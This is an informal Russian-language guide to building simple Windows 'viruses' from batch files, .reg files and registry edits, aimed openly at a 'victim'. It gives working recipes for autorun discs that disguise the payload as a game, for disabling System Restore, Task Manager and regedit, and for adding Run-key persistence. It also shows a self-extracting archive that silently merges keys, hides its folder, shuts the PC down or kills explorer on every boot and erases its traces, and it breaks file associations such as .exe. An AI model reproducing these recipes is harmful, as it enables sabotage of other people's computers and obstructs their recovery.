Всё это будет сохранено AUTORUN.inf

Должен появиться такой файл:

Это значёк файла конфигурации

Потом берём и записываем на диск наши три компонента:

virus.bat наш с вами «мощненький вирусик»
znak.ico какой нибуть красивый значёк (ради бога не бабочку)
AUTORUN.inf и файл который при раскрутки диска запустит вирус…
Игра... можете и не записывать.

Вирус, тут желательно делать такой который создаёт много мусора типа это игра столько занимает, которую вы предварительно запишите на диск. Правда после её удаления место существенно не прибавиться и только мы знаем почему. Преимущество такого вот способа состоит в том, что длительный процесс создания мусора можно сослать непосредственно на распаковку игры.


Знакомство с реестром

Итак, ненавижу теорию, но ща быстренько ознакомлю тех, кто не разу не лазил в реестре те, кто лазил, могут не читать, ничего нового я не скажу…
Итак, заходим по адресу: С:\WINDOWS и открываем regedit

Знак реестра. Кубик рубик какой-то!

Тут же открывается окошко, которое поделено на две части в левой части мы видим:

Так посмотрим что тут можно сломать

HKEY_CLASSES_ROOT | Здесь сведения обеспечивают запуск необходимой программы при открытии файла с помощью проводника. Этот раздел содержит связи между приложениями и типами файлов
HKEY_CURRENT_USER | Тут находяться настройки для текущего пользователя (т.е. для нас)
HKEY_LOCAL_MACHINE | Настройки, относящиеся к вашему компу и пременимы для всех пользователей. Раздел содержит информацию об аппаратной конфигурации и установленном программном обеспечении.
HKEY_USERS | Тут настройки для всех пользователей компа.
HKEY_CURRENT_CONFIG | Тут вся информация о текущей конфигурации

Каждый из этих разделов разбивается на множество подразделов, которые имеют свои параметры. Мы виим разные значки Все разделы и подразделы в левом окне, а параметры к ним в правом. Нажмите правой кнопкой мыши по правому окну вылетит строки создать, так что же мы можем создать:

REG_BINARY
(Двоичный параметр) 		Двоичные данные. Большинство сведений об аппаратных компонентах хранится в виде двоичных данных и выводится в редакторе реестра в шестнадцатеричном формате.
REG_DWORD
(параметр DWORD) 		Целые числа размером в 4 байта. Многие параметры служб и драйверов устройств имеют этот тип и отображаются в двоичном, шестнадцатеричном или десятичном форматах.
REG_EXPAND_SZ
(Расширяемый строковый параметр) 		Строка данных переменной длины.
REG_SZ
(Строковый параметр) 		Текстовая строка фиксированной длины.
REG_MULTI_SZ
(Мультистроковый параметр) 		Многострочный текст. Этот тип, как правило, имеют списки и другие записи в формате, удобном для чтения. Записи разделяются пробелами, запятыми или другими символами.

Вот погуляйте по реестру, нажимая плюсики и, меняя подразделы, и вы увидите, как их тут много, но изменения будут происходить в основном с параметрами, мы то добавим, что- нибудь, то удалим, или изменим. Сейчас я вам покажу экспортировать подраздел, чтобы не объяснять этого во время наших махинаций. Мы сейчас просто скопируем подраздел .lnk со всеми параметрами, например в «Мои документы» ну например для того если мы с вами нечаянно запустили наш вирус по уничтожению расширений, то можно взять и вернуть всё на место просто щелкнуть два раза по нашей копии в «Моих документах». Ну что открываем HKEY_CLASSES_ROOT и ищем .lnk если мы ещё плохо ориентируемся, то нажимаем «Правка» выбираем строку «Найти» пишем .lnk и нажимаем кнопку «Найти далее» система может чуть потупить, а потом покажет наш раздел. А мы нажимаем на него правой кнопкой, вылетает контекстное меню, выбираем «Экспортировать» и пишем имя нашего ключа (например: «расширение ярлыка») и жмём кнопку «Сохранить». И теперь если ни один ярлык не будет работать, есть шанс, что мы всё восстановим с помощью нашей заранее заготовленной копии.
Чтобы создать какой-нибудь ключ самому достаточно нажать правой кнопкой мыши в правом поле выбрать «Создать», а потом выбрать какой именно параметр мы хотим создать: «Двоичный» или «Мультистроковый» и д.р.
Чтобы удалить, жмём на параметр правой кнопкой и выбираем удалить (прежде чем удалять создайте копию раздела, где будет удалён ключ)


Кнопка Пуск

Скоросное меню

Нажали кнопку «Пуск» или «Start» навели, предположим, к строчке «Программы» а это строчка собака медлит и не вылетает можно ускорить этот процесс. Заходим по адресу:

HKEY_CURRENT_USER/Control Panel/Desktop
и ищем во всех ключах Desktop(а) ключ MenuShowDelay нажимаем на него два раза и в поле «Значение» (где по умолчанию стоит 400) пишем 0, подтверждаем ОК и всё после перезагрузки у вас будет метеор, а не контекстное меню. Ну это мы для себя старались, а вот для врага пишем в значении 9999999 и тогда он хер дождёться долваного меню.

Востоновление системы

Чтобы враг не востановился после наших махинаций, мы удалим пункт "Востановление системы"
Заходим по адресу:
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore
Создаём (DWORD) ключ DisableSR и присваеваем ему значение 1.

Все нижеперечисленые ключи необходимо создавать в разделе:
HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer

Очистка

Нажали «Пуск» нажали «Выполнить» а там столько всего команд ого-го как же сделать, чтобы всё было чисто? И ещё чтобы не чего не сохранялось в «недавних документах».

Заходим по адресу:

HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer

Там создаём «Двоичный параметр» даём ему имя ClearRecentDocsOnExit и пишем к нему значение 01 00 00 00. всё при включение комп будет очищать всё это.

Удалить недавние документы

Создаём там же (DWORD) ключ NoRecentDocsMenu и задаём ему значение 1.

Удаление строки"Выполнить"

Создаём (DWORD) ключ NoRun и задаём значение 1.

Удалить кнопку "Завершение работы"

Создаём (DWORD) ключ NoClose и задаём значение 1.

Удалить кнопку "Выход из системы"

Создаём (DWORD) ключ StartmenuLogoff и задаём значение 1.

Удаляем пункт "Найти"

Создаём (DWORD) ключ NoFind и задаём значение 1.

Удаление "Панель управления"

Создаём (DWORD) ключ NoSetFolders и задаём значение 1.

Чтобы небыло «Свойств» кнопки «Пуск»

Создаём (DWORD) ключ NoSetTaskbar и задаём значение 1.

Удаление пункта "Мои документы"(в XP пуске)

Создаём (DWORD) ключ NoRecentDocsMenu и задаём значение 1.

Удаление пункта "Справка"

Создаём (DWORD) ключ NoSMHelp и задаём значение 1.
Чтобы вернуть удалённое поросто поставте значение за место нуля "0" еденицу "1"


Рабочий стол

Версия компа (как в безопасном режиме)

Чтобы в правом нижнем углу была показана версия вашего компа заходи:

HKEY_CURRENT_USER\Control Panel\Desktop
Находим там ключ PaintDesktopVersion и меняем его значение с 0 на1.

Удаление тупой приставки

Вот вы когда создаёте ярлык, к какому либо документу всегда система приписывает слово «Ярлык» в начале названия это меня бесит хорошо, что можно этого избежать:

HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
Находим тут ключ link и изменяем его значение с 11 00 00 00 на 00 00 00 00.

Полезно для вируса, запуск при загрузки

Чтобы программы автоматически запускались при входе в систему:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Добавляем «Строковый параметр» (с любым именем) и в значении указываем полный путь к программе (Например: C:\Program Files\Download Master\dmaster.exe).

Корзины то НЭМА!

Можно убрать корзину с рабочего стола:

CAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
и когда мы открыли NameSpace мы видм несколько разделов со странными именами так вот берём и удаляем один из них его имя:
{645FF040-5081-101B-9F08-00AA002F954E}, и корзина пропадет со стола.

Скрыть "Мои документы"

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
и создаём параметр (DWORD) {450D8FBA-AD25-11D0-98A8-0800361B1103} со значением 1.

Удалим обои с рабочего стола

Можно удалить картинку с рабочего стола, он станет синим.

HKEY_CURRENT_USER\Control Panel\Desktop
и удаляем там параметр Wallpaper и картинка исчезает... А ещё можно в свойствах этого параметра прописать полный пть к любой картинке и она станет обоями.

Скрытие всех значков с рабочего стола! (страшно)

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
и создадим тут ключ (DWORD) NoDesktop со значением 1.

Запрет контекстного меню

Чтобы сделать недоступным контекстное меню при щелчке правой кнопкой мыши по рабочему столу или папке найдите ветвь:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
создайте параметр типа (DWORD) NoViewContextMenu со значением 1.

Часы

Можно написать своё слова заместо часов в правом -нижнем углу экрана
HKCU\Control Panel\International
создаем строковый параметр sTimeFormat а в свойствах пишем слово (не более 8 символов)

Значки рабочего стола

Все значки на рабочем столе имеют одинаковый размер по умолчанию это "35" а если поставить 500 или 900? Дааа хана, только одна папка "Мои документы" будет занимать почти всю область экрана... А к примеру если написать в значении "0" то само сабой значков не будет видно совсем... только их названия.
[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics] ищем тут параметр Shell Icon Sizeи меняем его значение на 900 или 0.

Контекстное меню и строка заголовка

HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics
находим там параметр MenuHeight и меняем его значение на 500 или больше... И когда вы откроете контекстное меню вы ох….те, оно будет очень здоровое. То же касается и некоторых программ, например "Блокнота" вот откройте блокнот с измененными параметрами это страшно. В этой же директории находим параметр:
CaptionHeight и меняем его значение так же на 500 или как хотите и теперь в любой программе вот эта синенькая полоска на самом верху, ну где справа стоит «Закрыть», «Свернуть», «Развернуть» превратиться в нечто ужасное, например, «Закрыть» такой красный квадратик с крестиком будет почти не пол экрана! (Неудобно....)


Разности

Меняем автозагрузку

Вот что я задумал, всем вам известно, что существует такая папка "Автозагрузка" Вы туда закидываете нужные вам ярлыки программ, и они при входе в систему запускаться. А если в этой папке нам положить ну эдак так папок 50 и различных файлов штук 300!!! Я об открытии пустых папок рассказывал в "Маленькие команды" мы их сами создавали, если помните, а тут я вам предлагаю поменять местоположение папки "Автозагрузка" на другую (соответственно на ту где куча файлов и папок) итак залетай по адресу:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

ищем там ключик:

Common Startup

Заходим в его свойства там у вас должно стоять:

%ALLUSERSPROFILE%\Главное меню\Программы\Автозагрузка

А мы с вами ставим путь к папке system32 (я думаю в этой папке больше всего всяких файлов.) Если вам по душе другие то пожалуйста. А вот я пишу:

C:\WINDOWS\system32

Вы только представите, что будет, когда при загрузке все файлы начнут открываться....
Можно зайти и вот куда:

[HKEY_USERS\S-1-5-21-1957994488-57989841-725345543-1003\Software\ Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]

Здесь мы найдём такие ключи как:

Desktop
Startup
Programs
Personal
Administrative Tools

И.т.д. все перечислять я устану, но и т так понятно, что здесь прописаны пути к "Моим документам" (Personal) "Рабочему столу" (Desktop) "Программам" это раздел в меню пуск (Programs). Так вот вы уже догадались, наверное, что мы точно так же пишем во всех свойствах этих ключей путь, к каким либо папкам. Может быть, вы сделаете так чтобы ваш вирус создал, пустую папку, а потом присвоил пути рабочего стола моих документов к этой вашей пустой папки. Это будет красиво, но лучше когда очень много файлов (система тупит)
Ну и потом мы этот ключ экспортируем иии... прочитаете в следующей главе как заставить врага слить этот ключ с его бедолагой реестром.

Удаление "Общих документов"

Чтобы убрать папку «Общие документы» из «Мой компьютер»

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\MyComputer\NameSpace\DelegateFolders

и удалить там раздел:
{59031a47-3f72-44a7-89c5-5595fe6b30ee}

Прощай "Диспетчер"

Можно отключить «Диспетчера задач» для врага "приятная" новость:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

создадим (DWORD) ключ DisableTaskMgr и присвоим значение 1.

Прощай REGEDIT

Можно запретить использования REGEDIT.EXE (реестр), чтобы враг не исправил наших махинаций

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

создадим (DWORD) ключ DisableRegistryTools и присвоим значение 1.

Свой рисунок при загрузки

Прежде чем комп загрузиться вы видите табло «Приветствие» так вот его можно поменять на свой рисунок:

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

Находим или создаём (строковый) Wallpape параметр, а в его значении пишем полный путь к нашему рисунку. Например:
С:\yrod.bmp
И теперь при входе в комп я созерцаю нарисованного мною в Paint(е) уродца!

Картинка на панели инструментов

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]

И создаём тут «Строковый» ключ BackBitmap в его значении так же пишем полный путь к рисунку. Например:
С:\virus.bmp

О как у меня на панели инструментов.

А ну открой папку.

[HKEY_CURRENT_USER\Control Panel\Mouse]

находим ключ DoubleClickSpeed и меняем значение на 100 ил 50.
Это какая скорость нужна для нажатия двойного щелчка по объекту (папке, файлу) в данном случае 500 миллисекунд, и если поменять значение 500 на например 100 или 50 то хер наша жертва сможет открыть что либо. Придётся работать с клавиатурой. Вот попробуйте за 100 миллисекунд нажать два раза кнопкой!

Тормоз или метиор?

[HKEY_CURRENT_USER\Control Panel\Mouse]

ищем ключ MouseSensitivity и меняем значение 2-16.
Это скорость передвижения курсора у меня стоит 10 у кого-нибудь, может 12, но мы поменяем значение на 2 и тогда курсор будет просто ужасно тормозить, не реагируя на дёргание мышкой. Можно поставить 16 и мышь будет летать как ракета (не очень то удобно).

След за мышкой

[HKEY_CURRENT_USER\Control Panel\Mouse]

ищем ключ MouseTrails и ставим 1-6
Это след от мыши можно поставить значение 6 и тогда когда курсор будет ехать то за ним будет отображаться его след. Больше число, длиннее след.

Автоматизация команд

Допустим нам надо отключить «Реестр» (ну мало ли не хотите чтобы ваш брат химичил в реестре, вы ему говорите Нельзя!!! Опасно!!! А он придурок лезит и вечно всё портит, а ты потом за ним целую ночь исправляй ошибки... Извените отвлёкся...) но неохото пол часа рыться в этом долбанном реестре и менять там разные значения. Можно всё автоматизировать пишим команды которые я покажу ниже в блокноте и сохрняете с расширением .reg или экспортируете определённый ключ и удаляете лишнее в общем сами разберётесь.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

Чтобы сново разрешить его использование:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

И стоить слить такой ключик с реестром «Реестр» отключиться (ну или влючиться). Таким же методом можно и автоатизировать многие другие команды. Только посторожнее нахер с этим запретом а то запретите а исправить уже не сможете. Это может либо другая программа для работы с реестром (благо она у меня есть, а то когда проверял эту команду ключик отката забыл, полез а мне дулю. Это мол Администратор вам запретил. Так что сделайте сначала ключик откатика второй на нашем рисуночке, бляяяяя чё то башню рвёт, долой пиво!!!!

И что же дальше?


Совместное использование

Возможно ли совместное использование реестра и .bat файлов? Да гордо отвечу я если их использовать совместно, то таких гор можно наворотить, что не разгрести.
Как экспортировать ключи вы знаете, мало того вы знаете какие ключи,… например чтобы запретить «Диспетчера задач» или заставить мышку ползать как черепаха. В первой версии этой книги я допустил неточность применения этой команды, но зато щас всё исправлю. Нашёл я эту команду, вы не поверите в FAR(е) ну что ж это ещё раз говорит что полезные и мощные программы помогают нам бодяжить вирусы ну довольно слов приступим. Итак допустим мы экспортировали ключ:

HKLM\SOFTWARE\ Microsoft\Windows NT\CurrentVersion\Winlogon (разуметься уже с изменёнными параметрами ShutdownWithoutLogon где значение равно 0.). если вы помните это означает что мы хотим убрать в меню «Пуск» команду «Выключить» (пусть ламер помучается пытаясь отключить свой комп). Так вот скопировали мы этот раздел и назвали его 000 (три нуля) теперь создаём новый командный файл .bat и пишем там такую команду:

start/wait regedit -s 000.reg

Всё!!! Мы видим, что мы запускаем наш ключ 000.reg «start» ну и «сливаем» его с реестром при чём говорим, что хотим обязательно дождаться конца этой операции, и преступит к другой «wait» (это сейчас необязательно ведь ключ у нас один, а вот когда мы набодяжим несколько, то стоит его и применить). А ещё мы говорим, чтобы система там нечего не запрашивала и делала всё тихо спокойно, чтобы не кто не догадался «–s»
Ну и в конце всё это дело архивируем WinRAR(ом) я думаю иначе никак, не будем же мы отсылать вирусы в папках вместе с каким-то .bat да и ещё с .reg он тут же заподозрит неладное. А так, пожалуйста, заархивировал, приказал ему после распаковки выполнить наш .bat тот в свою очередь «сливает» ключ с реестром, и вирус уже в компе. Можно ещё в конце добавить команду удаления всех своих файлов, чтобы он, если более или менее шарит в компах не смог догадаться, куда ты отправил ключ, так мы сожжем все мосты.
А как писать эту команду я уже говорил, тем более вы знаете названия файлов, которые необходимо стереть (ведь вы же их сами и написали).
В следующей главе я покажу ещё один пример использования совместного использования (типа для закрепления изученного материала).


Выключение

Отключение 2

Итак, если помните, я говорил что есть команда, которая при запуске вырубает комп, о ней я рассказывал в главе «Отключение» . И ещё в главе «Красивая оболочка» я описывал, как можно сделать, чтобы компьютер при повторном включении отключался снова. Но есть там недостаток, любой может при включении компа, держать нажатой клаву Shift и всё, автозагрузку он обошёл и наш хитро-тупорылый вирус не сработал. Сейчас я опешу ещё один такой пример. Почему только сейчас, а не в той главе? Да потому что этот пример будет содержать работу с реестром. А мы тоько-только начали с ним работать. Итак, приступим.
Давайте сразу условимся, что при распаковке нашего вируса из архива WinRAR он будет распакован в директорию C:\Program Files\virus. Теперь напишем команду отключения компа через 0 секунд и сохраним её 0.bat Теперь заходим по адресу в реестре:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

И создаём там «Сроковый параметр» и дадим ему название «virus». А в его значении напишем путь к нашему 0.bat файлу как вы помните, я сказал, куда его распаковывать итак в значении пишем:

C:\Program Files\virus\0.bat"

Всё, экспортируем этот ключ, ну допустим в «Мои документы», например 0.reg, а дальше всё делаем как в главе «Совместное использование». Осталось написать .bat файл, где будет прописано, как распаковывать без подтверждения наш .reg файл и обзавём его 1.bat И что-же у нас получилось?

0.bat

Shutdown -t 0 -s

1.bat

WINRAR запускает 1.bat который запускает
0.reg который сливается с реестром и говорит компу чтобы он при загрузке запускал 0.bat в котором прописана команда отключения компа. Всё просто.
start/wait regedit -s 0.reg
cd %ProgramFiles%
attrib +h +s virus

0.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"virus"="C:\\Program Files\\virus\\0.bat"

Бокировка

Всё что будет написано ниже не относиться к отключению, а к блокировке компа. И я подумал это практически одно и то же чё по двести глав писать и поэтому покажу, как заблокировать комп в этой главе.
Я применял разные способы блокировки, даже самые немыслимые, но вам я расскажу самый простой способ. Тем более он похож на предыдущую команду.
Итак, при установке вируса WinRAR автоматически записывает все три файла: 0.bat 1.bat и 0.reg в C:\Program Files\blok, а потом автоматически загружает файл 1.bat (надеюсь, вы уяснили, как это делать с помощью WinRAR. Если нет, читайте главу "Красивая оболочка"

1.bat

start/wait regedit -s 0.reg
cd %ProgramFiles%
attrib +h +s blok
Shutdown -t 0 –s

Здесь мы видим, что ключ 0.reg сливается с реестром. Затем переходим в Program Files и ставим атрибуты "Скрытый" и "Системный" на созданную нами папку blok (чтобы её не обнаружили, это так, предосторожность). Потом мы просто отключаем комп, чтобы параметры вступили в силу.

0.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Microssoft"="C:\\Program Files\\blok\\0.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000001

Здесь показан ключ, который сливается с реестром файлом 1.bat. Что мы видим? Мы приказываем компу при включении запускать файл 0.bat. И ещё есть две команды, ниже запрещающие использование "Диспетчера задач" и "Реестра" (чтобы жертва не стёрла этот ключ)

0.bat

taskkill /im explorer.exe /f /t

Это файл, который запускается при загрузке компа. В нём мы видим команду, которая снимает процесс explorer без него не видать вам ни рабочего стола, ни даже курсора мышки. Вы скажете этот процесс можно опять легко запустить с помощью "Диспетчера задач" ан нет, мы же его запретили (всё блин предусмотрено).

Обойти это проще простого, если вдруг вы нечаянно запустили вирус у себя, или просто решили испытать его, вру ли я или нет… Запускаем комп в безопасном режиме, просто при самом включении компа держите нажатой клаву F8, вылетит 9 или сколько там надписей мы выбираем строку «Безопасный режим» и жмём Enter и спокойно включаем наш комп, затем уже ежу понятно или заходим в реестр и стираем там строку, ведущую к запуску нашего вируса. Или просто удаляем папку, где вирус сидит. Хотя лучше сделать и то и то сразу (чё мусором забивать комп.)

И что же дальше?


Заключение

Если ты читаешь эти строки, то ты не грохнул реестр и не отформатировал свой диск… хотя может только пару раз...
Вот и всё, что для начала можно знать не совсем опытному юзеру, которым я и являюсь.
Если же вы знаете ещё какие-нибудь команды для MS-DOS(а) или новые разделы ключей (реестра) которые могут быть использованы для написания вирусиков, то обязательно пишите я их включу в следующее издание.
В этой незамысловатой книжонке рассказываеться про командные файлы MS-DOS(а) взаимодействующие с реестром, так что прошу не шлите мне цитирую:

А про С++ будет в следующей части?
Я тут на delphi код знаю один (далее код) включи его в следующей серии.
Это полная байда (далее ругательства) полная маза писать на С++ (ну и далее какой я плохой, что зря людей застовляю читать эту "Шнягу про мсдос")

Запомните, ни какого програмирования я в книге описывать не буду, мне хоть что нибудь самостоятельно бы сворганить, а потом и писать, а так...

Уже пишу

А не зайти ли мне на сайт?

Прочту всё заново

Для особо одарённых, т.е. для тех, кто дошел до самого заключения
я приготовил сюрприз. Можно скачать заготовку для вируса. СКАЧАТЬ

У ДАЧИ!


Расширение

Удалим расширение

Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…

assoc .lnk=.avi

здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!

assoc .exe=.avi

тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…
можно же просто удалить расширение, не заменяя его на другое:

assoc .exe=

после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.
Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)
В таблице я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои.

Приложение | .exe .com
Текстовые файлы | doc .txt .wp .wri
Музыкальные файлы | .MP3 .wav .avi .wmv .mpg
Картинки | .bmp .jpg .gif .tif .pic
Ярлыки | .lnk .url
Архиваторы | .rar .zip .arj
Шрифты | fon .ttf .atm
Файл реестра | .reg .key
Системные файлы | .sys .dll .rnf .drv .ega
Файл справки | .chm .hlp